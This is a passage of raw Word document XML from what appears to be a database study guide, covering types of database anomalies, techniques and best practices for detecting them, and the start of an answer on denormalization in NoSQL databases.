    <w:p w14:paraId="3C974828" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can indicate potential security breaches or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8028C" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Integrity Anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38466A6F" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>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Unexpected changes in data values, discrepancies between related data entries, or data inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DF94C" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can lead to data corruption or errors in business processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16018B57" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Operational Anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B3AF5" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>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Unusual database schema changes, unexpected modifications to database structures, or unplanned downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6521B0BD" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can disrupt database operations and affect application functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58864230"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Techniques for Database Anomaly Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A60B1F" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Statistical Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A057C61"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Use statistical methods to analyze historical data and identify deviations from normal patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F816017"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Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Descriptive statistics, z-scores, moving averages, and standard deviation calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31503DCE"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Analyzing query response times and flagging queries that significantly deviate from the average response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5FCD71" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Machine Learning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C595E6F"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Employ machine learning algorithms to model normal database behaviors and detect deviations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88C83A"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Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supervised learning (e.g., classification models), unsupervised learning (e.g., clustering, anomaly detection algorithms), and deep learning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09763550"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Training a model on historical access logs to identify unusual access patterns or abnormal usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7E22E" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rule-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCC751"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Define specific rules and thresholds to identify anomalies based on known patterns or behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D748A4"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Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set rules for thresholds on query execution times, error rates, or unusual access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A89BA"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Triggering alerts if the number of failed login attempts exceeds a predefined threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D528FB8" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Behavioral Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236055F2"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Monitor and analyze user and system behavior to detect deviations from normal activity patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CDDF0F"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Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: User behavior analytics (UBA), baseline profiling, and anomaly detection based on historical behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F31A7E"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Detecting unusual login times or access patterns that differ from a user’s typical behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364C17A9" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034779A"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Analyze database logs to identify anomalies or irregularities in database activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD142F"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Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Log parsing, pattern recognition, and real-time log monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175BFC42"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Monitoring logs for unusual SQL queries or unauthorized access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE937C2" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database Monitoring Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140CE7C5"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Use specialized database monitoring and management tools that include anomaly detection features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E241F52"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 Tools like SolarWinds Database Performance Analyzer, IBM Guardium, or Oracle Enterprise Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD273D0" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Real-time monitoring, alerts, and automated anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1E966" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices for Database Anomaly Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253CB0B" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Establish Baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1286E"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Create a baseline of normal database activity to compare against and identify deviations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898F016"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Track typical query performance, user access patterns, and data modification rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F4A97" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Define Clear Metrics and Thresholds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1D7173"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Set clear metrics and thresholds for normal and abnormal behavior to trigger alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D962684"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Define acceptable ranges for query response times and set thresholds for error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74505258" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Integrate with Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873E33E"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Ensure that anomaly detection is integrated with an incident response plan to address detected issues promptly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1A34F"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Automate alerting and ticketing processes to quickly respond to detected anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42C2C1" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly Update Models and Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B360A4E"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lastRenderedPageBreak/>
        <w:t>Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Continuously update and refine anomaly detection models and rules to adapt to changing patterns and behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033621EA"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Re-train machine learning models with new data and adjust rule-based thresholds based on evolving patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFBDBD" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Perform Regular Audits and Reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDECA30"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Conduct regular audits and reviews of detected anomalies to ensure accuracy and relevance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FF6BB3"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Review false positives and adjust detection mechanisms to reduce unnecessary alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D3B12E" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure Data Privacy and Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124114FE"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Protect sensitive data and ensure that anomaly detection processes do not compromise data privacy or security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF2199" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45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Encrypt logs and restrict access to monitoring tools and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198F81E" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463FBB54" w14:textId="0CB9F78A" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc178383323"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is denormalization, and why is it commonly used in NoSQL databases?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="1EB5508C" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Denormalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a database design technique where redundant data is intentionally introduced into a database schema to improve performance and query efficiency. It involves combining tables and reducing the level of normalization to optimize read operations and simplify data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFD736" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Denormalization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22500FFB" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:p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Denormalization is the process of optimizing a database by adding redundant data or by merging tables that were previously normalized. This contrasts with normalization, which aims to minimize redundancy and improve data integrity by splitting data into related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481D018" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:p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The primary goal of denormalization is to enhance performance, particularly for read-heavy operations, by reducing the need for complex joins and aggregations that can slow down query performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33192699" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
